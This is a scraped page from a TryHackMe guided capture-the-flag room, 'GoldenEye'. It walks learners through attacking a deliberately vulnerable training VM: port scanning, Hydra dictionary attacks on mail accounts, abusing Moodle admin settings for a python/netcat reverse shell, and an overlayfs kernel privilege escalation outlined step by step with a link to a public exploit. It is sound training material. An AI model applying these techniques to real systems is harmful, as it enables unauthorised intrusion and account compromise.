Room Banner

GoldenEye

Bond, James Bond. A guided CTF.

medium

75 min

Room progress ( 0% )

To access material, start machines and answer questions login.

Task 1Intro & Enumeration

This room will be a guided challenge to hack the James Bond styled box and get root.

Credit to creosote for creating this VMThis machine is used here with the explicit permission of the creator <3

So.. Lets get started!

Answer the questions below

First things first, connect to our network and deploy the machine.

Use nmap to scan the network for all ports. How many ports are open?

Take a look on the website, take a dive into the source code too and remember to inspect all scripts!

Who needs to make sure they update their default password?

Whats their password?

Now go use those credentials and login to a part of the site.

Onto the next steps.. 

Answer the questions below

Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable? 

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?

Inspect port 55007, what service is configured to use this port?

Login using that service and the credentials you found earlier.

What can you find on this service?

What user can break Boris' codes?

Using the users you found on this service, find other users passwords

Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.

Answer the questions below

If you remembered in some of the emails you discovered, there is the severnaya-station.com website. To get this working, you need up update your DNS records to reveal it.

If you're on Linux edit your "/etc/hosts" file and add:

<machines ip> severnaya-station.com

If you're on Windows do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file

Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir

Try using the credentials you found earlier. Which user can you login as?

Have a poke around the site. What other user can you find?

What was this users password?

Use this users credentials to go through all the services you have found to reveal more emails.

What is the next user you can find from doak?

What is this users password?

Take a look at their files on the moodle (severnaya-station.com)

Download the attachments and see if there are any hidden messages inside them?

Using the information you found in the last task, login with the newly found user.

As this user has more site privileges, you are able to edit the moodles settings. From here get a reverse shell using python and netcat.

Take a look into Aspell, the spell checker plugin.

Now that you have enumerated enough to get an administrative moodle login and gain a reverse shell, its time to priv esc.

Answer the questions below

Download the linuxprivchecker to enumerate installed development tools.

To get the file onto the machine, you will need to wget your local machine as the VM will not be able to wget files on the internet. Follow the steps to get a file onto your VM:

  • Download the linuxprivchecker file locally
  • Navigate to the file on your file system
  • Do: python -m SimpleHTTPServer 1337 (leave this running)
  • On the VM you can now do: wget <your IP>/<file>.py

OR

Enumerate the machine manually.

Whats the kernel version?

This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:

  • Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
  • Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
  • Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
  • Make su on overlayfs world writable without changing the owner
  • Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
  • Execute the modified su binary

You can download the exploit from here: https://www.exploit-db.com/exploits/37292

Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key!

What development tools are installed on the machine?

What is the root flag?

Created by

Room Type

Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!

Users in Room

22,151

Created

2388 days ago

Ready to learn Cyber Security? Create your free account today!

TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.

Already have an account? Log in

We use cookies to ensure you get the best user experience. For more information contact us.

Read more